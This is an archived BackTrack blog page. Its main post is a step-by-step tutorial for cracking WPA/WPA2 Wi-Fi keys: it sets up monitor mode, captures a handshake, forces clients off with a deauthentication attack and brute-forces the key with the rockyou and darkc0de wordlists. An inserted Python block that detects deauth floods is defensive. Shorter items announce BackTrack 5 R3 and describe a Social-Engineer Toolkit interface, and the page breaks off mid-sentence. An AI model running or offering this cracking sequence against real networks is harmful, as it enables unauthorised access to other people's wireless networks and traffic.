Archive | BackTrack

Wireless WPA and WPA2 Cracking Tutorial

Terminal Commands for WPA/WPA2 wireless cracking:

airmon-ng start wlan0
airodump-ng mon0

Press Ctrl+Z to break out of ‘airodump-ng’ after you collect the wireless access point’s BSSID and CH #.

airmon-ng stop mon0
airmon-ng start wlan0 10
airodump-ng -c 10 --bssid 00:11:50:61:18:72 -w wpadeauth mon0

Wait and collect the WPA/WPA2 handshake when a device that knows the key connects to the wireless network. Alternatively, if a client is already on the network, you can use aireplay-ng's deauthentication attack, which “sends disassociate packets to one or more clients which are currently associated with a particular access point.”[1] The capture file above is written by airodump-ng as wpadeauth-01.cap (the -w option takes a file prefix and appends -01.cap itself).

aireplay-ng -0 3 -a 00:11:50:61:18:72 -c 58:55:CA:96:EE:84 mon0

Now that you have the WPA/WPA2 handshake, let’s crack it!

gunzip darkc0de.lst.gz
7z x rockyou.7z
aircrack-ng -w darkc0de.lst -b 00:11:50:61:18:72 wpadeauth-01.cap
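The deauthentication step above is also what a wireless IDS looks for: a burst of deauth/disassoc management frames from one BSSID to one client in a short window. The following detector is an added example written for this page, not code from the original post; it assumes raw 802.11 frames with no radiotap header and no trailing FCS, and the capture it runs on is constructed inline using the BSSID and client address from the tutorial.

```python
import struct
from collections import defaultdict, deque

# Management-frame (type 0) subtypes that kick a client off the network.
DEAUTH, DISASSOC = 0x0C, 0x0A

def parse_mgmt_frame(frame: bytes):
    """Parse a deauth/disassoc frame header; return None for any other frame."""
    if len(frame) < 26:
        return None
    fc = frame[0]                         # Frame Control byte 0: subtype<<4 | type<<2 | version
    ftype, subtype = (fc >> 2) & 0x3, fc >> 4
    if ftype != 0 or subtype not in (DEAUTH, DISASSOC):
        return None
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    (reason,) = struct.unpack("<H", frame[24:26])   # 2-byte little-endian reason code
    return {"subtype": subtype, "dst": mac(frame[4:10]), "src": mac(frame[10:16]),
            "bssid": mac(frame[16:22]), "reason": reason}

def detect_deauth_bursts(frames, threshold=5, window=2.0):
    """frames: iterable of (timestamp, raw_frame) in time order.
    Alert when one BSSID sends >= threshold deauth/disassoc frames to one
    destination within `window` seconds (sliding window, fires once per crossing)."""
    seen, alerts = defaultdict(deque), []
    for ts, raw in frames:
        info = parse_mgmt_frame(raw)
        if info is None:
            continue
        key = (info["bssid"], info["dst"])
        q = seen[key]
        q.append(ts)
        while q and ts - q[0] > window:   # drop frames that fell out of the window
            q.popleft()
        if len(q) == threshold:
            alerts.append({"bssid": key[0], "target": key[1], "count": len(q),
                           "at": ts, "reason": info["reason"]})
    return alerts

def build_frame(subtype, dst, src, bssid, reason=7):
    """Constructed test data only: minimal deauth/disassoc frame, no FCS."""
    m = lambda s: bytes.fromhex(s.replace(":", ""))
    return (bytes([subtype << 4, 0]) + b"\x00\x00" + m(dst) + m(src) + m(bssid)
            + b"\x00\x00" + struct.pack("<H", reason))

# Constructed capture: one benign deauth at t=0, a flood of 8 at t=10, one data frame.
AP, STA = "00:11:50:61:18:72", "58:55:ca:96:ee:84"
SAMPLE_CAPTURE = [(0.0, build_frame(DEAUTH, STA, AP, AP, reason=3))]
SAMPLE_CAPTURE += [(10.0 + i * 0.05, build_frame(DEAUTH, STA, AP, AP)) for i in range(8)]
SAMPLE_CAPTURE.append((10.9, bytes([0x08, 0x00]) + b"\x00" * 24))   # data frame, ignored
```

Running `detect_deauth_bursts(SAMPLE_CAPTURE)` reports a single alert for the flood and nothing for the lone deauth at t=0; tune `threshold` and `window` to the AP's normal roaming behaviour before deploying.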


Recommended cards for wireless injection with BackTrack and/or Kali:

  • Alfa AWUS036H (Highly recommended and has better range)
  • Alfa AWUS036NHA (Also great, less range but faster wifi connection)

Wordlists used above:

  • darkc0de.lst.gz
  • rockyou.7z

BackTrack 5 R3 Released

Officially unveiled at BlackHat USA 2012, BackTrack 5 R3 has now been released to the masses. There are KDE and GNOME flavours, 32- and 64-bit ISOs, and a single VMware image (GNOME, 32-bit). As the release notes put it, “for those requiring other VM flavors of BackTrack – building your own VMWare image is easy – instructions can be found in the BackTrack Wiki.”



Social Engineering Toolkit (SET) in Graphical Web

The web interface for the Social-Engineer Toolkit takes whatever you select and generates an answer file that is ultimately fed to set-automate. Each response assigns a given value, and the built-in logic on the back-end parses your responses to build and craft the attack inside SET.

Download Social Engineer Toolkit 3.6:

svn co set/

To turn on the web interface, simply type